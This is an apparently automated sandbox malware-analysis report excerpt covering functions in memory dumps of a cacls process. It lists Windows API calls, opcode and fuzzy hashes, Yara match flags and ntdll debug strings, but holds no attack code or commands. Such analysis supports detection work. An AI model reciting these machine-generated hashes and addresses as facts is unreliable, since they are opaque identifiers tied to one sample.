                                                          • Instruction Fuzzy Hash: 13F0653338032437D72261E99C02FDBB39D8B817A1F54002AFB0CDA1C5D591B50186A9
                                                          Function 02739DEC Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02739E35
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
                                                          • Instruction ID: ca4cd93292755a6a7a7cfc9d5a8455e8fc0f2860cafd00d671497cc81cfa5285
                                                          • Opcode Fuzzy Hash: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
                                                          • Instruction Fuzzy Hash: C4F0653338026076D73266A58C46FEBA75D8F81751F540019F74DAA1C5CA91B901C6A4
                                                          Function 027484A7 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02742040,0275834F,02755A0E,02742006), ref: 027484E3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
                                                          • Instruction ID: 447559d076adfea4e45a69db1f27979a5b805633f22564a5124544c2f7520251
                                                          • Opcode Fuzzy Hash: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
                                                          • Instruction Fuzzy Hash: C6E092362412087BFA119BA4DC47F56735DC702791F4482A8FD0CDB2C1EB25A22096A6
                                                          Function 02759BE0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,02744101,000000F4), ref: 02759C1F
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                          • Instruction ID: 4077457961b00ccd9dadaa0f2bc8bd26fe1d02e0bfc426add67767847ee51732
                                                          • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                          • Instruction Fuzzy Hash: F5E09A722002087BCA20EE99DC45FEB73ADEFC9720F008018FD08A7241CA70B9518BF8
                                                          Function 02759B90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(02741D39,?,027562C8,02741D39,02755A0E,027562C8,?,02741D39,02755A0E,00001000,?,?,?), ref: 02759BCC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                          • Instruction ID: b4d5b794ec707e2274fb635b4c4adfb887a1341e46bca55e903e804dbf360bb7
                                                          • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                          • Instruction Fuzzy Hash: ADE06572200208BBC614EE68DC44FEB73ADEFC9710F008418F909A7241CA70BA118BF8
                                                          Function 027486B9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?), ref: 027486EC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
                                                          • Instruction ID: c08bcd272234c52273e444d25d6543d6d3713743458af63bf04a24f68ba0a249
                                                          • Opcode Fuzzy Hash: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
                                                          • Instruction Fuzzy Hash: 7EE026716003082BEA24AA6CCC55FA2335C5B08728F544654FE58DF2D7DF78F502425B
                                                          Function 027486C0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?), ref: 027486EC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
                                                          • Instruction ID: f400d7d0483114a18ef48a369ac7a4caa57f034901fc2ff68ac357f5ab6af730
                                                          • Opcode Fuzzy Hash: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
                                                          • Instruction Fuzzy Hash: 47E026316003082BEB246AACDC45F62334C9B48728F484660BA5CCF2D2EF78F502415A
                                                          Function 027484B0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02742040,0275834F,02755A0E,02742006), ref: 027484E3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
                                                          • Instruction ID: ec36ef1500cf859162036ea0a7daf2b1dbc2627005afbf6543a674296a46235c
                                                          • Opcode Fuzzy Hash: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
                                                          • Instruction Fuzzy Hash: 6FD05E723403083BFA12AAE4CC06F56328D4B05794F858068BE4CD62C2EA64F1004AAA
                                                          Function 031C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e9d4b39158139bdef385a84d0d9c12803c821864f089a2279879d7a2c815813e
                                                          • Instruction ID: d9e208d3e2955e844e80399b110cdf7375adca1df5ea6be22c839a672f970029
                                                          • Opcode Fuzzy Hash: e9d4b39158139bdef385a84d0d9c12803c821864f089a2279879d7a2c815813e
                                                          • Instruction Fuzzy Hash: D5B09B719015D5C7DE11E7604708717791467D5701F29C465D2030641E4739C5D1E175

                                                          Non-executed Functions

                                                          Function 0307DF2A Relevance: 56.5, Strings: 45, Instructions: 211COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925368683.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3070000_cacls.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                          • API String ID: 0-3558027158
                                                          • Opcode ID: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                          • Instruction ID: 5ec3f72f3dbcb8393afc51fa7461f3301992fd84d78ba6714ffd878b255e6809
                                                          • Opcode Fuzzy Hash: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                          • Instruction Fuzzy Hash: F09131F04082948AC7158F59A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                          Function 031C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 4e454c3c3e704914b3c95de469052631f5c5cdf6a70f2e94bbb3aa0cf770042e
                                                          • Instruction ID: 5086db05a577ed83efaffe831368c66586d203ac9aaa0b9e76bfe593f7beec74
                                                          • Opcode Fuzzy Hash: 4e454c3c3e704914b3c95de469052631f5c5cdf6a70f2e94bbb3aa0cf770042e
                                                          • Instruction Fuzzy Hash: A251E6B6A10256BFCF14DB98889097EF7B8BF1D200B18856DE4A9D7641D374EE418BE0
                                                          Function 03232410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 00112ceff096688a1994b4eb0f3a88d589704188450f0f28a271c0f150188e0f
                                                          • Instruction ID: 2b53f49b71b29b60be6f9f0f9b69842eabc2cc198b05dcc13affa5f21fed5bae
                                                          • Opcode Fuzzy Hash: 00112ceff096688a1994b4eb0f3a88d589704188450f0f28a271c0f150188e0f
                                                          • Instruction Fuzzy Hash: 115104F5A10746EFCB24DE5CC89097FB7F9EF49200B088C59E5A6D7641E7B4EA808760
                                                          Function 031B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • ExecuteOptions, xrefs: 031F46A0
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 031F4655
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 031F4725
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 031F4742
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031F46FC
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 031F4787
                                                          • Execute=1, xrefs: 031F4713
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 717f892882a3a917457e9ae2e21a62a981c676ecab13d0b9972da59e13cccfdd
                                                          • Instruction ID: 65ed34f64a19d10fad05985dffeb5acb79c488d46ce0b5fb48049b9cc25c59cf
                                                          • Opcode Fuzzy Hash: 717f892882a3a917457e9ae2e21a62a981c676ecab13d0b9972da59e13cccfdd
                                                          • Instruction Fuzzy Hash: 1E51F735A003197FEF25EAA5EC99FEE77B8AF4C700F0400A9D505AB1D1EB719A858F50
                                                          Function 03256940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction ID: c2599a4fed9e32f77277c95d8b4b26c170fbd5fe9fde0d51e75291836f3fef04
                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction Fuzzy Hash: DB021575528341AFC304CF28C494E6FBBE5EFC8700F549A2DB9895B264DB71EA85CB42
                                                          Function 031CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: eb3f8b07ccb4863cc385fc1e1eb0cfe4acd04b0e7bfb4cc610a0e4ee9f88a5bf
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: 35819F70E292D99BDF28CEA8C8527AEBBB5AF69310F1CC15DD851E73D1C73498808B51
                                                          Function 032320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 455c39d4525bcbdf4d68183111b0c695dd847fb6ab68158cb6d0dca2ba7a40d6
                                                          • Instruction ID: c633d22707c5d9c623a3d67c2e504d462edfa37040e054706c5167a2702c3793
                                                          • Opcode Fuzzy Hash: 455c39d4525bcbdf4d68183111b0c695dd847fb6ab68158cb6d0dca2ba7a40d6
                                                          • Instruction Fuzzy Hash: DA2195B6A1031AABCB10DF79DD40AEEB7FCEF59A40F080516E955E7201E730DA418BE0
                                                          Function 03070388 Relevance: 7.6, Strings: 6, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925368683.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3070000_cacls.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: |de$|de$|de$|de$|de$|de
                                                          • API String ID: 0-3287866246
                                                          • Opcode ID: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                          • Instruction ID: 66e542a1350e32481d7e7fe4663dab36863988495b962b1763b348e452c2ebfe
                                                          • Opcode Fuzzy Hash: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                          • Instruction Fuzzy Hash: 69216870918B4E8FCF80EFA8D885AEEBBB0FB59300F00455AD549E7261D7349245CBD2
                                                          Function 031AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 031F031E
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031F02BD
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031F02E7
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: e1c5e55a1a96361048841ba798834a332ad038059b03f060ad8bf3db22e3f9ca
                                                          • Instruction ID: e6641b33bd441a563b88d6d4f3593db94f148261a9c504fe5cb7d6b88d027487
                                                          • Opcode Fuzzy Hash: e1c5e55a1a96361048841ba798834a332ad038059b03f060ad8bf3db22e3f9ca
                                                          • Instruction Fuzzy Hash: 8DE1D078608B419FD725CF28C884B2AB7E0BF8C315F184A5DF5A58B2E1D774D886CB52
                                                          Function 031BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Resource at %p, xrefs: 031F7B8E
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 031F7B7F
                                                          • RTL: Re-Waiting, xrefs: 031F7BAC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: 71446cad3db5ca56521bfa31cdbc40a80505588d8b578ce1f753914e013d3b9d
                                                          • Instruction ID: f60cd72098900620f899434db0ba763d629e578ac2f32d8581bd048acabf8375
                                                          • Opcode Fuzzy Hash: 71446cad3db5ca56521bfa31cdbc40a80505588d8b578ce1f753914e013d3b9d
                                                          • Instruction Fuzzy Hash: BE4102353087029FD724DE25C840BAAB7E5EF8D710F044A1DF99ADBA80DB71E445CB91
                                                          Function 031BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031F728C
                                                          Strings
                                                          • RTL: Resource at %p, xrefs: 031F72A3
                                                          • RTL: Re-Waiting, xrefs: 031F72C1
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 031F7294
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: b8487de6e767305af88ba3bf0bf17e543ea274552b8fc84dc3678e7c419c57bf
                                                          • Instruction ID: aaa68e9a47590b78ae3ebaed57abe45c669eb152d4d931dc93385b32ac9036bd
                                                          • Opcode Fuzzy Hash: b8487de6e767305af88ba3bf0bf17e543ea274552b8fc84dc3678e7c419c57bf
                                                          • Instruction Fuzzy Hash: 62411F35608202AFC720DE25CC41FAAB7A5FB8C750F144A18F956AB680DB30E896CBD1
                                                          Function 03232300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 7b71fe9c33d89a6da6099f16c7561c92afea520f46cfd0f9809142b11a634734
                                                          • Instruction ID: edc50c7b11d4de7f2c6d2a37881d86b5785acbd4e284edcf31cc419a5e980a5d
                                                          • Opcode Fuzzy Hash: 7b71fe9c33d89a6da6099f16c7561c92afea520f46cfd0f9809142b11a634734
                                                          • Instruction Fuzzy Hash: 29317A76A10319DFCB20DF29DC40BEEB7F8EF45610F544955E849E7140EB309A459BA1
                                                          Function 031C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: 22294aa9655ff7fd1ce6aac20b28749acac325c7802ec4085907fbbd74b3a9e4
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: CD91C371E202899FDB24DE69C8D06BEB7A5AF6C720F18451EE875E72C0D7B08991CF50
                                                          Function 03189126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: e076330367d181eb2e87721d914c4b442e8f96602684b04610c58fd192afcd69
                                                          • Instruction ID: 4fccbf0c6dcd5618e331fe8a5681c799a08a815a6e8504547ad4766c38a3b21e
                                                          • Opcode Fuzzy Hash: e076330367d181eb2e87721d914c4b442e8f96602684b04610c58fd192afcd69
